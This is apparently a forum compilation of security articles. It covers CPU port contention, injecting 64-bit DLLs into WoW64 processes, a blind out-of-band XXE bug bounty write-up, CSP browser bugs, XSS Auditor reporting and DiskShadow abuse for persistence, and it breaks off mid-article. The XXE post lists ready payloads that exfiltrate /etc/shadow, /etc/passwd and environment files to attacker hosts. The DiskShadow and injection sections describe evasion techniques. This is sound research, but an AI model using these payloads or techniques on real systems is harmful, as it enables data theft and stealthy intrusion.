| jnz 0xffffffffffffffbe Total Num Of Uops: 17 Why we have 8 cycles per iteration? On modern x86 processors load instruction takes at least 4 cycles to execute even the data is in the L1-cache. Although according to Agner’s instruction_tables.pdf it has 2 cycles latency. Even if we would have latency of 2 cycles we would have (16 [loads] * 2 [cycles]) / 2 [ports] = 16 cycles. According to this calculations we should receive 16 cycles per iteration. But we are running at 8 cycles per iteration. Why this happens? Well, like most of execution units, load units are also pipelined, meaning that we can start second load while first load is in progress on the same port. Let’s draw a simplified pipeline diagram and see what’s going on. This is simplified MIPS-like pipeline diagram, where we usually have 5 pipeline stages: F(fetch) D(decode) I(issue) E(execute) or M(memory operation) W(write back) It is far from real execution diagram of my CPU, however, I preserved some important constraints for IvyBridge architecture (IVB): IVB front-end fetches 16B block of instructions in a 16B aligned window in 1 cycle. IVB has 4 decoders, each of them can decode instructions that consist at least of a single uop. IVB has 2 pipelined units for doing load operations. Just to simplify the diagrams I assume load operation takes 2 cycles. M1 and M2 stage reflect that in the diagram. It just need to be said that I omitted one important constraint. Instructions always retire in program order, in my later diagrams it’s broken (I simply forgot about it when I was making those diagrams). Drawing such kind of diagrams usually helps me to understand what is going on inside the processor and finding different sorts of hazards. Some explanations for this pipeline diagram In first cycle we fetch 4 loads. We can’t fetch LOAD5, because it doesn’t fit in the same 16B aligned window as first 4 loads. In second cycle we were able to decode all 4 fetched instructions, because they all are single-uop instructions. In third cycle we were able to issue only first 2 loads. One of such load goes to PORT2, the second goes to PORT3. Notice, that LOAD3 and LOAD4 are stalled (typically waiting in Reservation Station). Only in cycle #4 we were able to issue LOAD3 and LOAD4, because we know M1 stages will be free to use in next cycle. Continuing this diagram further we could see that in each cycle we are able to retire 2 loads. We have 16 loads, so that explains why it takes only 8 cycles per iteration. I made additional experiment to prove this theory. I collected some more performance counters: Benchmark Cycles CYCLES_GE_3_UOP_EXEC CYCLES_GE_2_UOP_EXEC CYCLES_GE_1_UOP_EXEC max load capacity 8.02 1.00 8.00 8.00 Results above show that in each of 8 cycles (that it took to execute one iteration) at least 2 uops were issued (two loads issued per cycle). And in one cycle we were able to issue 3 uops (last 2 loads + dec-jnz pair). Conditional branches are executed on PORT5, so nothing prevents us from scheduling it in parrallel with 2 loads. What is even more interesting is that if we do simulation with assumption that load instruction takes 4 cycles latency, all the conclusions in this example will be still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions each cycle. And that would mean that our 16 loads (inside each iteration) will retire in 8 cycles. Utilizing other available ports in parallel In the example that I presented, I’m only utilizing PORT2 and PORT3. And partailly PORT 5. What does that mean? Well, it means that we can schedule instructions on another ports in parrallel with loads just for free. Let’s try to write such an example. I added after each pair of loads one bswap instruction. This instruction reverses the byte order of a register. It is very helpful for doing big-endian to little-endian conversion and vice-versa. There is nothing special about this instruction, I just chose it because it suites best to my experiments. According to Agner’s instruction_tables.pdf bswap instruction on a 32-bit register is executed on PORT1 and has 1 cycle latency. max load capacity + 1 bswap ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx dec edi jnz .loop Here are the results for such experiment: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 max load capacity + 1 bswap 8.03 8.00 8.01 8.01 1.00 First observation is that we get 8 more bswap instructions just for free (we are running still at 8 cycles per iteration), because they do not contend with load instructions. Let’s look at the pipeline diagram for this case: We can see that all bswap instructions nicely fit into the pipeline causing no hazards. Overutilizing ports Modern compilers will try to schedule instructions for particular target architecture to fully utilize all execution ports. But what happens when we try to schedule too much instruction for some execution port? Let’s see. I added one more bswap instruction after each pair of loads: port 1 throughput bottleneck ; esi contains the beginning of the cache line ; edi contains number of iterations (1000) .loop: mov eax, DWORD [esi] mov eax, DWORD [esi + 4] bswap ebx bswap ecx mov eax, DWORD [esi + 8] mov eax, DWORD [esi + 12] bswap ebx bswap ecx mov eax, DWORD [esi + 16] mov eax, DWORD [esi + 20] bswap ebx bswap ecx mov eax, DWORD [esi + 24] mov eax, DWORD [esi + 28] bswap ebx bswap ecx mov eax, DWORD [esi + 32] mov eax, DWORD [esi + 36] bswap ebx bswap ecx mov eax, DWORD [esi + 40] mov eax, DWORD [esi + 44] bswap ebx bswap ecx mov eax, DWORD [esi + 48] mov eax, DWORD [esi + 52] bswap ebx bswap ecx mov eax, DWORD [esi + 56] mov eax, DWORD [esi + 60] bswap ebx bswap ecx dec edi jnz .loop When I measured result using uarch-bench tool here is what I received: Benchmark Cycles UOPS.PORT1 UOPS.PORT2 UOPS.PORT3 UOPS_PORT5 port 1 throughput bottleneck 16.00 16.00 8.01 8.01 1.00 To understand why we now run at 16 cycles per iteration, it’s best to look at the pipeline diagram again: Now it’s clear to see that we have 16 bswap instructions and only one port that can handle this kind of instructions. So, we can’t go faster than 16 cycles in this case, because IVB processor executes them sequentially. Different architectures might have more ports to handle bswap instructions which may allow them to run faster. By now I hope you understand what port contention is and how to reason about such issues. Know limitations of your hardware! Additional resources More detailed information about execution ports of your processor can be found in Agner’s microarchitecture.pdf and for Intel processors in Intel’s optimization manual. All the assembly examples that I showed in this article are available on my github. UPD 23.03.2018 Several people mentioned that load instructions can’t have 2 cycles latency on modern Intel Architectures. Agner’s tables seems to be not accurate there. I will not redo the diagrams as it will be difficult to understand them, and they will shift the focus from the actual thing I wanted to explain. Again, I didn’t want to reconstruct how the pipeline diagram will look in reality, but rather to explain the notion of port contention. However, I totally accept the comment and it should mentioned. But also if we assume that load instruction takes 4 cycles latency in those examples, all the conclusions in the post are still valid, because the throughput is what matters (as Travis mentioned in his comment). There will be still 2 retired load instructions per cycle. Another important thing to mention is that hyperthreading helps utilize execution “slots”. See more details in HackerNews comments. Sursa: https://dendibakh.github.io/blog/2018/03/21/port-contention
  5. DEEP HOOKS: MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS – PART 1 By Yarden Shafir and Assaf Carlsbad - March 12, 2018 Introduction This blog post is the first in a three-part series describing the challenges one has to overcome when trying to hook the native NTDLL in WoW64 applications (32-bit processes running on top of a 64-bit Windows platform). As documented by numerous other sources, WoW64 processes contain two versions of NTDLL. The first is a dedicated 32-bit version, which forwards system calls to the WoW64 environment, where they are adjusted to fit the x64 ABI. The second is a native 64-bit version, which is called by the WoW64 environment and is eventually responsible for user-mode to kernel-mode transitions. Due to some technical difficulties in hooking the 64-bit NTDLL, most security-related products hook only 32-bit modules in such processes. Alas, from an attacker’s point of view, bypassing these 32-bit hooks and the mitigations offered by them is rather trivial with the help of some well-known techniques. Nonetheless, in order to invoke system calls and carry out various other tasks, most of these techniques would eventually call the native (that is, 64-bit) version of NTDLL. Thus, by hooking the native NTDLL, endpoint protection solutions can gain better visibility into the process’ actions and become somewhat more resilient to bypasses. In this post we describe methods to inject 64-bit modules into WoW64 applications. The next post will take a closer look at one of these methods and delve into the details of some of the adaptations required for handling CFG-aware systems. The final post of this series will describe the changes one would have to apply to an off-the-shelf hooking engine in order to hook the 64-bit NTDLL. When we started this research, we decided to focus our efforts mainly on Windows 10. All of the injection methods we present were tested on several Windows 10 versions (mostly RS2 and RS3), and may require a slightly different implementation if used on older Windows versions. Injection Methods Injecting 64-bit modules into WoW64 applications has always been possible, though there are a few limitations to consider when doing so. Normally, WoW64 processes contain very few 64-bit modules, namely the native ntdll.dll and the modules comprising the WoW64 environment itself: wow64.dll, wow64cpu.dll, and wow64win.dll. Unfortunately, 64-bit versions of commonly used Win32 subsystem DLLs (e.g. kernelbase.dll, kernel32.dll, user32.dll, etc.) are not loaded into the process’ address space. Forcing the process to load any of these modules is possible, though somewhat difficult and unreliable. Hence, as the first step of our journey towards successful and reliable injection, we should strip our candidate module of all external dependencies but the native NTDLL. At the source code level, this means that calls to higher-level Win32 APIs such as VirtualProtect() will have to be replaced with calls to their native counterparts, in this case – NtProtectVirtualMemory(). Other adaptations are also required and will be discussed in detail in the final part of this series. Figure 1 – a minimalistic DLL with only a single import descriptor (NTDLL) After we create a 64-bit DLL that adheres to these limitations, we can go on to review a few possible injection methods. Hijacking wow64log.dll As previously discovered by Walied Assar, upon initialization, the WoW64 environment attempts to load a 64-bit DLL, named wow64log.dll directly from the system32 directory. If this DLL is found, it will be loaded into every WoW64 process in the system, given that it exports a specific, well-defined set of functions. Since wow64log.dll is not currently shipped with retail versions of Windows, this mechanism can actually be abused as an injection method by simply hijacking this DLL and placing our own version of it in system32. Figure 2 – ProcMon capture showing a WoW64 process attempting to load wow64log.dll The main advantage of this method lies in its sheer simplicity – All it takes to inject the module is to deploy it to the aforementioned location and let the system loader do the rest. The second advantage is that loading this DLL is a legitimate part of the WoW64 initialization phase, so it is supported on all currently available 64-bit Windows platforms. However, there are a few possible downsides to this method: First, a DLL named wow64log.dll may already exist in the system32 directory, even though (as mentioned above) it’s not there by default. Second, this method provides little to no control over the injection process as the underlying call to LdrLoadDll() is ultimately issued by system code. This limits our ability to exclude certain processes from injection, specify when the module will be loaded, etc. Heaven’s Gate More control over the injection process can be achieved by simply issuing the call to LdrLoadDll()ourselves rather than letting a built-in system mechanism call it on our behalf. In reality, this is not as straightforward as it may seem. As one can correctly assume, the 32-bit image loader will refuse any attempt to load a 64-bit image, stopping this course of action dead in its tracks. Therefore, if we wish to load a native module into a WoW64 process we must somehow go through the native loader. We can do this in two stages: Gain the ability to execute arbitrary 32-bit code inside the target process. Craft a call to the 64-bit version of LdrLoadDll(), passing the name of the target DLL as one of its arguments. Given the ability to execute 32-bit code in the context of the target process (for which a plethora of ways exist), we still need a method by which we can call 64-bit APIs freely. One way to do this is by utilizing the so-called “Heaven’s Gate”. “Heaven’s Gate” is the commonly used name for a technique which allows 32-bit binaries to execute 64-bit instructions, without going through the standard flow enforced by the WoW64 environment. This is usually done via a user-initiated control transfer to code segment 0x33, that switches the processor’s execution mode from 32-bit compatibility mode to 64-bit long mode. Figure 3 – a thread executing x86 code, just prior to its transition to x64 realm. After the jump to the x64 realm is made, the option of directly calling into the 64-bit NTDLL becomes readily available. In the case of exploits and other potentially malicious programs, this allows them to avoid hitting hooks placed on 32-bit APIs. In the case of DLL injectors, though, this solves the problem at hand as it opens up the possibility of calling the 64-bit version of LdrLoadDll(), capable of loading 64-bit modules. Figure 4 – for demonstration purposes, we used the Blackbone library to successfully inject a 64-bit module into a WoW64 process using Heaven’s Gate. We will not go into any more detail about specific implementations of “Heaven’s Gate”, but the inquisitive reader can learn more about it here. Injection via APC With the ability to load a kernel-mode driver into the system, the arsenal of injection methods at our disposal grows significantly. Among these methods, the most popular is probably injection via APC: It is used extensively by some AV vendors, malware developers and presumably even by the CIA. In a nutshell, an APC (Asynchronous Procedure Call) is a kernel mechanism that provides a way to execute a custom routine in the context of a particular thread. Once dispatched, the APC asynchronously diverts the execution flow of the target thread to invoke the selected routine. APCs can be classified as one of two major types: Kernel-mode APCs: The APC routine will eventually execute kernel-mode code. These are further divided into special kernel-mode APCs and normal kernel-mode APCs, but we will not go into detail about the nuances separating them. User-mode APCs: The APC routine will eventually execute user-mode code. User-mode APCs are dispatched only when the thread owning them becomes alertable. This is the type of APC we’ll be dealing with in the rest of this section. APCs are mostly used by system-level components to perform various tasks (e.g. facilitate I/O completion), but can also be harnessed for DLL injection purposes. From the perspective of a security product, APC injection from kernel-space provides a convenient and reliable method of ensuring that a particular module will be loaded into (almost) every desired process across the system. In the case of the 64-bit NT kernel, the function responsible for the initial dispatch of user-mode APCs (for native 64-bit processes as well as WoW64 processes) is the 64-bit version of KiUserApcDispatcher(), exported from the native NTDLL. Unless explicitly requested otherwise by the APC issuer (via PsWrapApcWow64Thread()) the APC routine itself will also execute 64-bit code, and thus will be able to load 64-bit modules. The classic way of implementing DLL injection via APC revolves around the use of a so-called “adapter thunk”. The adapter thunk is a short snippet of position-independent code written to the address space of the target process. Its main purpose is to load a DLL from the context of a user-mode APC, and as such it will receive its arguments according to the KNORMAL_ROUTINE specification: Figure 5 – the prototype of a user-mode APC procedure, taken from wdm.h As can be seen in the figure above, functions of type KNORMAL_ROUTINE receive three arguments, the first of which is NormalContext. Like many other “context” parameters in the WDM model, this argument is actually a pointer to a user-defined structure. In our case, we can use this structure to pass the following information into the APC procedure: The address of an API function used to load a DLL. In WoW64 processes this has to be the native LdrLoadDll(), as the 64-bit version of kernel32.dll is not loaded into the process so using LoadLibrary() and its variants is not possible. The path to the DLL we wish to load into the process. Once the adapter thunk is called by KiUserApcDispatcher(), it unpacks NormalContext and issues a call to the supplied loader function with the given DLL path and some other, hardcoded arguments: Figure 6 – A typical “adapter thunk” set as the target of a user-mode APC To use this technique to our benefit, we wrote a standard kernel-level APC injector and modified it in a way that should support injection of 64-bit DLLs into WoW64 processes (shown in Appendix A ). Albeit promising, when attempting to inject our DLL into any CFG-aware WoW64 process, the process crashed with a CFG validation error. Figure 7 – A CFG validation error caused by the attempt to call the adapter thunk Next Post: In the next post we will delve into some of the implementation details of CFG to help grasp why this injection method fails, and present several possible solutions to overcome this obstacle. Appendixes Appendix A – complete source code for APC injection with adapter thunk Sursa: https://www.sentinelone.com/blog/deep-hooks-monitoring-native-execution-wow64-applications-part-1/
  6. Posted on March 24, 2018 by tghawkins Today, I’d like to share my methodology behind how I found a blind, out of band xml external entities attack in a private bug bounty program. I have redacted the necessary information to hide the program’s identity. As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page: I noticed in the response, the xml content-type along with an xml body containing XML SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of the issuing a 405 Method Not Allowed error, I decided to issue a request containing xml syntax with the content-type: application/xml. The resulting response was also different than in the previous cases. This response was also in XML as it was when issuing the GET request to this endpoint. However this time, within the tags is the value “OK” instead of the original value “TestRequestCalled”. I also tried to send a json request to see how the application would respond. Below is the result. Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to an set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the dtd being successfully processed, with the requested file contents appended. I also used this script: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb to set up, and have an ftp server listening so I would also be able to extract the server’s information/file contents through the ftp protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue. Some helpful XXE payloads: -------------------------------------------------------------- Vanilla, used to verify outbound xxe or blind xxe -------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> ]> <r>&sp;</r> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; ]> <r>&exfil;</r> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> ---------------------------------------------------------------- OoB variation of above (seems to work better against .NET) ---------------------------------------------------------------- <?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml"> %sp; %param1; %exfil; ]> ## External dtd: ## <!ENTITY % data SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://x.x.x.x:443/?%data;'>"> --------------------------------------------------------------- OoB extraction --------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/shadow"> <!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd"> %sp; %param3; %exfil; ]> ## External dtd: ## <!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>"> ----------------------------------------------------------------------- OoB extra ERROR -- Java ----------------------------------------------------------------------- <?xml version="1.0"?> <!DOCTYPE r [ <!ENTITY % data3 SYSTEM "file:///etc/passwd"> <!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd"> %sp; %param3; %exfil; ]> <r></r> ## External dtd: ## <!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external; ----------------------------------------------------------------------- OoB extra nice ----------------------------------------------------------------------- <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % start "<![CDATA["> <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml "> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://evil/evil.xml"> %dtd; ]> <root>&all;</root> ## External dtd: ## <!ENTITY all "%start;%stuff;%end;"> ------------------------------------------------------------------ File-not-found exception based extraction ------------------------------------------------------------------ <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" > %one; %two; %four; ]> ## External dtd: ## <!ENTITY % three SYSTEM "file:///etc/passwd"> <!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>"> -------------------------^ you might need to encode this % (depends on your target) as: &#x25; -------------- FTP -------------- <?xml version="1.0" ?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd"> %asd; %c; ]> <a>&rrr;</a> ## External dtd ## <!ENTITY % d SYSTEM "file:///proc/self/environ"> <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>"> --------------------------- Inside SOAP body --------------------------- <soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body> --------------------------- Untested - WAF Bypass --------------------------- <!DOCTYPE :. SYTEM "http://" <!DOCTYPE :_-_: SYTEM "http://" <!DOCTYPE {0xdfbf} SYSTEM "http://" view rawXXE_payloads hosted with by GitHub Sursa: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
  7. Stefan Matsson 2018-03-26 # Security CSP IMPLEMENTATIONS ARE BROKEN TL;DR frame-src is inconsistent cross browser block-all-mixed-content is broken in Chrome and Opera CSP reports are inconsitent Edge has some weird edge cases (no pun intended) INTRO There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and force the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue as it contains rules for what the browser can load and what not to load. Read more at https://content-security-policy.com I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found in different browsers and with different combinations of devices, OSs, browsers, extensions and whatnot. SOME INFO ON THE SYSTEM WE ARE BUILDING My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literaly hundreds of trusted providers all over the world and each of these have their own page that must be loaded in the iframe. I will not go into more details on why to not reveal to much information about my client. FRAME-SRC IS INCONSISTENT CROSS BROWSER If your CSP contains a frame-src that does not contain mailto: or tel: these links will be blocked inside the iframe except in Firefox and Edge. Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers. There are valid arguments for both cases. Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel: I have reported this to Microsoft but have not heard back. Affected browsers: Firefox and Edge or all others depending on your point of view Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/ EDGE AND CUSTOM ERROR PAGES We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to we currenty use this frame-src in our CSP: frame-src 'self' data: https: The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// url (e.g ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurrs. I have reported this issue to Microsoft in early March but have not heard anything back from them. Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web: Affected browsers: Edge Proof of concept: https:/jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/ EDGE AND EXTENSIONS Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything from loading images to JS will fail and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released according to the Edge issue tracker (issue 1132012). Affected browsers: Edge BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors: Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS. Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS. This issue has been reported to Google and Opera. Opera has not yet responded. Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead) Affected browsers: Chrome and Opera Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/ SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2 “Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 do support CSP2. Since we require the use of script hashes we also require CSP2. Desktop Safari is also affected is not as big of a problem as most desktops are up to date. Current usage on our site is less than 0.9% for older Safari on desktop. Workaround: There is no way to make this work so we have disabled CSP for older iOS devices using user agent sniffing. Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1 IE11 supports CSP1 using the X-Content-Security-Policy. If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy or send out both headers for everyone. In our case we barely have any customers on IE11 so we just send out the regular Content-Security-Policy header which is then ignored by IE11. Affected browsers: Internet Explorer 11 (older versions does not support CSP) CSP REPORTS DIFFER BETWEEN BROWSERS The reports sent to your report-uri should follow a common standard defined in the CSP spec but browsers differ on what data they send. Some versions of Safari includes the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.” Chrome on Android does sometimes not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe. Most browsers does not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked. CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES This is primarily due to browser extensions. Most extension work by injecting code on the page and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src blocked-uri: about:blank which is casued by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank. SUMMARY Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site. Sursa: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
  8. Introducing XSS Auditor reporting to Report URI March 26, 2018 Whilst we already have support for CSP reports over at Report URI, there is another potential source of information about XSS attacks that may be attempted or happening on your site. The X-XSS-Protection header allows you to configure the XSS Auditor, deem what action it should take and request that the auditor send reports if action is required. We now support XSS Auditor reporting on Report URI! The XSS Auditor The XSS Auditor runs whilst HTML is being parsed and attempts to find reflected XSS attacks against the user. If it finds a possible attack the Auditor can take no action, it can filter what it thinks is the attack payload or it can refuse to render the page at all. You can find more details about the XSS Auditor which is present in Chromium and WebKit so there is a good share of browsers that have one. Configuring the Auditor The default configuration for the XSS Auditor varies depending on which version of which browser you're using, of course, but configuring it is easy enough. You can control the auditor with the X-Xss-Protectionheader with a few simple values. You can read more detail about configuring the auditor in my blog post Hardening your HTTP response headers and you can test to see if your site, or any other site, has it deployed properly using securityheaders.io. No matter which configuration you use, as long as you have the auditor enabled, it can send reports about the action it takes. X-Xss-Protection: 1; mode=block; report=https://{subdomain}.report-uri.com/r/d/xss/enforce XSS Reports Whilst the original purpose of CSP was to defend against XSS attacks, and it can do that very sucessfully, if you have both CSP and XXP (X-Xss-Protection) deployed you can benefit from an even better level of protection. There's no reason to think you don't need one if you have the other, leverage the protection of both! Whether you do or don't have CSP deployed, you can deploy XXP and have the Auditor stop attacks before they even take place. If CSP is a last line of defence in the browser then XXP is an additional, penulitmate line of defence. With the auditor configured, if it sees any kind of reflected XSS attack on your site it will send a report that looks like this. "xss-report" : { "request-url":"https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/?search=%3Cscript%3Ealert(123);%3C/script%3E", "request-body":""} } This is a great report to receive and it will tip you off about a likely issue on one of your pages. The good thing about the report is that it won't be sent if the browser doesn't find the content of the GET parameter reflected somewhere in the page, so the false positive rate should be fairly low. You might see some novel attacks against your users, find some nifty XSS payloads or just rest assured knowing that if the browser thinks there's a problem then it will tell you. Deploy it alongside CSP, before CSP or after CSP, it doesn't really matter, but it's available now and you should go check it out. Support The XSS Auditor can send reports from Chromium and WebKit based browsers which gives us a pretty high level of visibility. WebKit will happily send those reports right now but Chrome does have a small interruption in service at present. You can read more in the Chromium Bug but Chrome will being sending reports again during April, so we will be back on track there. The great thing about reporting mechanisms like this is that we can still get value from the feature even without 100% browser support. There are a lot of WebKit browsers out there and they may be able to tell you something useful. Other Updates We've also released a few other features here and there over the last couple of months so I wanted to detail those too. The list is far from exhaustive but here's a few: When filtering your repors on the Reports page, the filter is now reflected into the URL. This means you can bookmark/share/save filters for more convenient use in the future. Back/forward navigation also works as expected. After the recent update that introduced wildcard queries in the hostname and path fields, we've also introduced a 'not' filter that does exactly what you'd expect. We've made some improvements to our filtering for inbound reports. There's now less noise making it through to your account and we have special handling in place for a few browser bugs so reports will make more sense overall. There have been countless UI tweaks and improvements to make the browsing experience better including series highlighting and toggling on the graphs page, better sorting on the Reports tables, Team invite emails, performance improvements and much more! After launching XSS Auditor Reporting today we've started our 7 day countdown to our next feature launch which is going to be a big one. I'm really excited about the launch next week and I'm hoping everyone will love the new feature as much as we do! Sursa: https://scotthelme.co.uk/introducing-xss-reporting-to-report-uri/
  9. DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction MARCH 26, 2018 ~ BOHOPS [Source: blog.microsoft.com] Introduction Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations. *Don’t mind the ridiculous title – it just seemed thematic What is DiskShadow? “DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ – Microsoft Docs DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation), however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence. DiskShadow Command Execution As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file. Let’s demonstrate each of these capabilities: Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. Interactive Mode In the following example, a normal user invokes calc.exe: Script Mode In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt: diskshadow.exe /s c:\test\diskshadow.txt Like Vshadow, take note that the DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing. Auto-Start Persistence & Evasion Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the proceeding examples, we will update our script then create a RunKey and Scheduled Task. Preparation Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time. Note: The proceeding example is 